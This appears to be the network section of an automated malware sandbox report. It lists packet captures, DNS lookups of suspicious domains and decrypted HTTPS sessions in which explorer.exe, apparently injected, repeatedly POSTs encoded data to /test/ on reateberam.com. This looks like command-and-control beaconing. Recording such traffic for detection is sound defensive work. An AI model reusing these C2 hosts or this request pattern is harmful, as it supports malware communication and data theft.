                                                                  Dec 2, 2024 18:46:35.287410021 CET44350030104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:35.287594080 CET50030443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:35.287827969 CET50030443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:35.287847042 CET44350030104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:36.554126024 CET44350030104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:36.554215908 CET50030443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:36.554711103 CET50030443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:36.554723024 CET44350030104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:36.555911064 CET50030443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:36.555916071 CET44350030104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:38.187917948 CET44350030104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:38.187977076 CET50030443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:38.188007116 CET44350030104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:38.188040972 CET44350030104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:38.188045979 CET50030443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:38.188081980 CET50030443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:38.188487053 CET50030443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:38.188518047 CET44350030104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:38.335872889 CET50031443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:38.335916996 CET44350031104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:38.335984945 CET50031443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:38.336499929 CET50031443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:38.336518049 CET44350031104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:39.600796938 CET44350031104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:39.600996971 CET50031443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:39.602566957 CET50031443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:39.602566957 CET50031443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:39.602581024 CET44350031104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:39.602596998 CET44350031104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:41.249255896 CET44350031104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:41.249351978 CET44350031104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:41.249401093 CET50031443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:41.251976013 CET50031443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:41.252079964 CET50031443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:41.252100945 CET44350031104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:41.379975080 CET50032443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:41.380017996 CET44350032104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:41.383133888 CET50032443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:41.383441925 CET50032443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:41.383450985 CET44350032104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:42.597521067 CET44350032104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:42.597579956 CET50032443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:42.607147932 CET50032443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:42.607152939 CET44350032104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:42.633595943 CET50032443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:42.633606911 CET44350032104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:44.202526093 CET44350032104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:44.202621937 CET44350032104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:44.202735901 CET50032443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:44.202826977 CET50032443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:44.203000069 CET50032443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:44.203016996 CET44350032104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:44.263226986 CET50033443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:44.263284922 CET44350033104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:44.263365984 CET50033443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:44.263817072 CET50033443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:44.263825893 CET44350033104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:45.531234980 CET44350033104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:45.533585072 CET50033443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:45.548016071 CET50033443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:45.548048973 CET44350033104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:45.556014061 CET50033443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:45.556036949 CET44350033104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:47.148499012 CET44350033104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:47.148648977 CET44350033104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:47.148715019 CET50033443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:47.152158976 CET50033443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:47.152159929 CET50033443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:47.219999075 CET50034443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:47.220051050 CET44350034104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:47.220252991 CET50034443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:47.220730066 CET50034443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:47.220741034 CET44350034104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:47.502387047 CET50033443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:47.502435923 CET44350033104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:48.435122013 CET44350034104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:48.435187101 CET50034443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:48.435647964 CET50034443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:48.435657024 CET44350034104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:48.437731028 CET50034443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:48.437736034 CET44350034104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:50.020045996 CET44350034104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:50.020138979 CET44350034104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:50.020225048 CET50034443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:50.020518064 CET50034443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:50.020524025 CET44350034104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:50.083658934 CET50035443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:50.083700895 CET44350035104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:50.083843946 CET50035443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:50.084150076 CET50035443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:50.084161043 CET44350035104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:51.389961958 CET44350035104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:51.390038013 CET50035443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:51.390486002 CET50035443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:51.390494108 CET44350035104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:51.391587973 CET50035443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:51.391592979 CET44350035104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:53.129092932 CET44350035104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:53.129192114 CET44350035104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:53.129218102 CET50035443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:53.129415989 CET50035443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:53.129448891 CET50035443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:53.129467010 CET44350035104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:53.202017069 CET50036443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:53.202064991 CET44350036104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:53.206360102 CET50036443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:53.206710100 CET50036443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:53.206721067 CET44350036104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:54.473361969 CET44350036104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:54.473438025 CET50036443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:54.474190950 CET50036443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:54.474199057 CET44350036104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:54.476043940 CET50036443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:54.476051092 CET44350036104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:56.061059952 CET44350036104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:56.061108112 CET50036443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:56.061131001 CET44350036104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:56.061180115 CET44350036104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:56.061188936 CET50036443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:56.061223030 CET50036443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:56.061636925 CET50036443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:56.061652899 CET44350036104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:56.309659004 CET50037443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:56.309710979 CET44350037104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:56.309776068 CET50037443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:56.310225010 CET50037443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:56.310240030 CET44350037104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:57.693523884 CET44350037104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:57.693588018 CET50037443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:57.693989038 CET50037443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:57.694000959 CET44350037104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:57.695869923 CET50037443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:57.695878029 CET44350037104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:59.093195915 CET44350037104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:59.093283892 CET44350037104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:59.093595982 CET50037443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:59.094082117 CET50037443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:59.094103098 CET44350037104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:59.276016951 CET50038443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:59.276061058 CET44350038104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:46:59.276581049 CET50038443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:59.276581049 CET50038443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:46:59.276611090 CET44350038104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:00.613079071 CET44350038104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:00.613179922 CET50038443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:47:00.614758015 CET50038443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:47:00.614769936 CET44350038104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:00.616879940 CET50038443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:47:00.616885900 CET44350038104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:02.283963919 CET44350038104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:02.284059048 CET44350038104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:02.284185886 CET50038443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:47:02.284483910 CET50038443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:47:02.284507036 CET44350038104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:02.340296984 CET50039443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:47:02.340358019 CET44350039104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:02.340426922 CET50039443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:47:02.340797901 CET50039443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:47:02.340811968 CET44350039104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:03.675304890 CET44350039104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:03.676152945 CET50039443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:47:03.677572012 CET50039443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:47:03.677572012 CET50039443192.168.2.5104.21.68.89
                                                                  Dec 2, 2024 18:47:03.677588940 CET44350039104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:03.677604914 CET44350039104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:05.405579090 CET44350039104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:05.405699015 CET44350039104.21.68.89192.168.2.5
                                                                  Dec 2, 2024 18:47:05.405950069 CET50039443192.168.2.5104.21.68.89

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 2, 2024 18:42:59.796358109 CET6426353192.168.2.51.1.1.1
                                                                  Dec 2, 2024 18:43:00.168072939 CET53642631.1.1.1192.168.2.5
                                                                  Dec 2, 2024 18:43:02.728329897 CET6341753192.168.2.51.1.1.1
                                                                  Dec 2, 2024 18:43:02.871155977 CET53634171.1.1.1192.168.2.5
                                                                  Dec 2, 2024 18:43:13.840821028 CET6009753192.168.2.51.1.1.1
                                                                  Dec 2, 2024 18:43:14.497829914 CET53600971.1.1.1192.168.2.5
                                                                  Dec 2, 2024 18:43:24.944145918 CET6139653192.168.2.51.1.1.1
                                                                  Dec 2, 2024 18:43:25.320846081 CET53613961.1.1.1192.168.2.5
                                                                  Dec 2, 2024 18:43:34.090838909 CET5884753192.168.2.51.1.1.1
                                                                  Dec 2, 2024 18:43:34.458060026 CET53588471.1.1.1192.168.2.5
                                                                  Dec 2, 2024 18:44:42.943789005 CET5402353192.168.2.51.1.1.1
                                                                  Dec 2, 2024 18:44:43.086226940 CET53540231.1.1.1192.168.2.5
                                                                  Dec 2, 2024 18:45:08.249401093 CET6423453192.168.2.51.1.1.1
                                                                  Dec 2, 2024 18:45:08.412924051 CET53642341.1.1.1192.168.2.5

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 2, 2024 18:42:59.796358109 CET192.168.2.51.1.1.10xbc1fStandard query (0)huanvn.comA (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:43:02.728329897 CET192.168.2.51.1.1.10x2208Standard query (0)huanvn.comA (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:43:13.840821028 CET192.168.2.51.1.1.10x1471Standard query (0)vutarf.comA (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:43:24.944145918 CET192.168.2.51.1.1.10xbe26Standard query (0)vutarf.comA (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:43:34.090838909 CET192.168.2.51.1.1.10xf310Standard query (0)vutarf.comA (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:44:42.943789005 CET192.168.2.51.1.1.10x81f7Standard query (0)reateberam.comA (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:45:08.249401093 CET192.168.2.51.1.1.10x3b4dStandard query (0)dogirafer.comA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 2, 2024 18:43:00.168072939 CET1.1.1.1192.168.2.50xbc1fNo error (0)huanvn.com103.57.249.207A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:43:02.871155977 CET1.1.1.1192.168.2.50x2208No error (0)huanvn.com103.57.249.207A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:43:11.004147053 CET1.1.1.1192.168.2.50xd559No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:43:11.004147053 CET1.1.1.1192.168.2.50xd559No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:43:14.497829914 CET1.1.1.1192.168.2.50x1471No error (0)vutarf.com94.232.43.224A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:43:25.320846081 CET1.1.1.1192.168.2.50xbe26No error (0)vutarf.com94.232.43.224A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:43:34.458060026 CET1.1.1.1192.168.2.50xf310No error (0)vutarf.com94.232.43.224A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:44:43.086226940 CET1.1.1.1192.168.2.50x81f7No error (0)reateberam.com172.67.217.190A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:44:43.086226940 CET1.1.1.1192.168.2.50x81f7No error (0)reateberam.com104.21.16.251A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:44:54.557385921 CET1.1.1.1192.168.2.50x8578No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:44:54.557385921 CET1.1.1.1192.168.2.50x8578No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:45:08.412924051 CET1.1.1.1192.168.2.50x3b4dNo error (0)dogirafer.com104.21.68.89A (IP address)IN (0x0001)false
                                                                  Dec 2, 2024 18:45:08.412924051 CET1.1.1.1192.168.2.50x3b4dNo error (0)dogirafer.com172.67.192.128A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • reateberam.com
                                                                  • dogirafer.com

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549907172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:44:44 UTC416OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hmdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 92
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:44:44 UTC92OUTData Raw: 4c 48 44 4d 46 38 2f 6d 69 75 38 77 5a 78 61 4b 31 32 7a 6c 79 48 78 50 62 6b 43 45 44 53 71 37 50 4b 48 76 2f 6d 4f 49 4d 47 66 2f 7a 54 71 76 33 47 2f 57 36 50 6e 76 74 69 45 36 65 52 70 37 49 38 33 73 6e 6b 68 63 57 65 2f 71 78 36 78 74 7a 50 48 55 30 36 70 42 69 45 45 3d
                                                                  Data Ascii: LHDMF8/miu8wZxaK12zlyHxPbkCEDSq7PKHv/mOIMGf/zTqv3G/W6PnvtiE6eRp7I83snkhcWe/qx6xtzPHU06pBiEE=
                                                                  2024-12-02 17:44:45 UTC789INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:45 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5e74ERtA%2BfBQnivRhAg5AqzV3H6uJvzps67hovkye0KqoUQ3hMzFGaT71OE4hsh%2BhmWV4KCloH7V5uhDeavPBBGpHu4zGW3c16uxWSdLMd1yMpSNZUFtT5N7TA8lA7zisA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2070ae1136a0-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=56258&min_rtt=30547&rtt_var=29820&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1168&delivery_rate=95590&cwnd=32&unsent_bytes=0&cid=9e39c87d544dce7b&ts=876&x=0"
                                                                  2024-12-02 17:44:45 UTC98INData Raw: 35 63 0d 0a 50 69 57 62 51 38 57 33 33 49 70 67 59 52 76 63 68 57 61 73 79 6e 4e 4b 4f 45 33 51 41 30 36 71 5a 76 36 33 74 69 2f 45 4b 52 69 62 6e 32 4c 39 30 57 37 54 36 5a 58 68 73 54 56 71 4a 6b 38 75 4e 70 58 70 67 46 34 69 43 62 62 51 73 4b 51 50 75 70 53 70 70 34 51 44 31 77 3d 3d 0d 0a
                                                                  Data Ascii: 5cPiWbQ8W33IpgYRvchWasynNKOE3QA06qZv63ti/EKRibn2L90W7T6ZXhsTVqJk8uNpXpgF4iCbbQsKQPupSpp4QD1w==
                                                                  2024-12-02 17:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.549916172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:44:47 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hndViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:44:48 UTC796INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dfI64oB%2FTCAAIQXBvzm3%2BOlEBq0e3km5HRET%2F%2BOFtPSxXcJXLO8k3X6qdZNkqXgO2eHljjEk1Lr8Xjk1MN6P%2FbyN8G9XpOtqL8X29Iq%2FY2xIVa8CDWuv04ifAPrEoRHvJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd20850ae35e72-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1751&rtt_var=701&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1512953&cwnd=193&unsent_bytes=0&cid=523f52900f0abd16&ts=776&x=0"
                                                                  2024-12-02 17:44:48 UTC50INData Raw: 32 63 0d 0a 50 69 36 56 54 63 75 36 32 59 70 67 5a 78 7a 5a 68 32 50 6a 67 33 35 50 4f 45 76 66 41 30 36 70 62 50 71 36 76 69 66 46 4b 52 69 62 0d 0a
                                                                  Data Ascii: 2cPi6VTcu62YpgZxzZh2Pjg35POEvfA06pbPq6vifFKRib
                                                                  2024-12-02 17:44:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.549922172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:44:50 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:44:50 UTC791INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:44:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9EV8Q%2FAKjzZ1NgxrZhghToGONYvdKgLT5dohopYro1CLhBiVosTjXsy0V1Zl6p88uWyzISCqu5vgxSn6NMbjl8p%2FjwXgxa3fET0cZ693LndFd9SCgrkb%2FrzNJjtn7wNDTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd209328bd36a9-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14288&min_rtt=14281&rtt_var=5369&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=203654&cwnd=32&unsent_bytes=0&cid=bc88edd5db5f33bd&ts=803&x=0"
                                                                  2024-12-02 17:44:50 UTC431INData Raw: 31 61 38 0d 0a 50 43 79 62 51 4d 75 31 33 59 70 6a 61 68 76 62 67 32 44 6a 67 33 52 49 4f 30 33 54 41 45 36 6c 61 76 6d 77 75 79 58 4f 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 52 6f 4a 45 38 72 66 4a 4f 4f 67 6c 67 68 44 37 4b 2f 74 75 30 4e 73 5a 57 75 6f 4d 38 2b 67 69 56 54 48 57 46 45 35 73 54 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 38 77 7a 44 65 72 6e 49 33 4d 59 61 4c 37 45 65 6e 67 70 71 34 56 43 36 6c 4c 59 44 78 77 70 68 6b 6f 38 4f 56 34 4c 4e 38 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 52 53 54 70
                                                                  Data Ascii: 1a8PCybQMu13Ypjahvbg2Djg3RIO03TAE6lavmwuyXOKRib7xuPoA21j4bUizRoJE8rfJOOglghD7K/tu0NsZWuoM8+giVTHWFE5sTsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4F8wzDernI3MYaL7Eengpq4VC6lLYDxwphko8OV4LN8C9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfRSTp
